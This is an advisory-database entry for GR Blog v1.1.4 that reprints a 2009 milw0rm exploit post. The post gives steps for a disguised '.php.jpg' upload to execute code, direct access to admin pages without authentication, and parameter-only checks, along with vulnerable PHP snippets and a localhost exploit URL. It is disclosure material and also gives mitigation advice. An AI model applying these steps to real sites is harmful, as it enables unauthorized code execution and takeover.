GR Blog v1.1.4 (Upload/Bypass) Multiple Remote Vulnerabilities

vendor:

GR Blog

by:

Jose Luis Gongora Fernandez

7.5

CVSS

HIGH

Multiple Remote Vulnerabilities

N/A

CWE

Product Name: GR Blog

Affected Version From: GR Blog v1.1.4

Affected Version To: GR Blog v1.1.4

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

GR Blog v1.1.4 (Upload/Bypass) Multiple Remote Vulnerabilities

GR Blog v1.1.4 is vulnerable to multiple remote vulnerabilities, including remote file upload, simple bypass, GET bypass, and POST bypass. The remote file upload vulnerability allows an attacker to upload a malicious file with a .php.jpg extension, which can be used to execute arbitrary code on the server. The simple bypass vulnerability allows an attacker to bypass authentication and access restricted files. The GET bypass vulnerability allows an attacker to access restricted files by manipulating the 'uid' parameter. The POST bypass vulnerability allows an attacker to access restricted files by manipulating the 'postStart' and 'categoryName' parameters.

Mitigation:

Ensure that all user-supplied input is properly validated and sanitized. Ensure that all authentication and authorization checks are properly implemented. Ensure that all files are uploaded to a non-web-accessible directory.

Source

Exploit-DB raw data:

GR Blog v1.1.4 (Upload/Bypass) Multiple Remote Vulnerabilities
 
Author: Jose Luis Gongora Fernandez
        (a.k.a) JosS <sys-project[at]hotmail.com>

Web:    http://hack0wn.com/
 
/*************************/
TEST ON VERSION GR Blog v1.1.4, (in my localhost)
Download : http://sirini.net/grboard/board.php?id=grblog&articleNo=43
/*************************/
 
[+] Remote File Upload:
 
 /admin/admin_upload.php (simple bypass)
 upload --> name.php.jpg
 
 PATH example: /data/2009/02/04/name.php.jpg
 
 
 --------------
 files: /admin
 
[+] SIMPLE bypass:
 
 admin_user.php
 admin_post.php
 admin_all.php
 more files...
 
 !xpl: you enter in any files
 
[+] GET bypass:
 
 admin_modify_comment.php
 --
 <?php
 @header('Content-Type: text/html; charset=utf-8');
 if(array_key_exists('uid', $_GET) && $_GET['uid']) $uid = $_GET['uid'];
 else exit();
 --
 !xpl: http://localhost/blog/admin/admin_modify_comment.php?uid=1
 
 more files...
 
[+] POST bypass:
 
 admin_category.php
 --
 <?php
 if(array_key_exists('categoryName', $_POST) && $_POST['categoryName'])
 --
 !xpl: --
 
 admin_insert.php
 --
 <?php
 $e = true;
 if(array_key_exists('postStart', $_POST) && $_POST['postStart'])
 --
 !xpl: --
 
 more files...
 
 __h0__

# milw0rm.com [2009-02-04]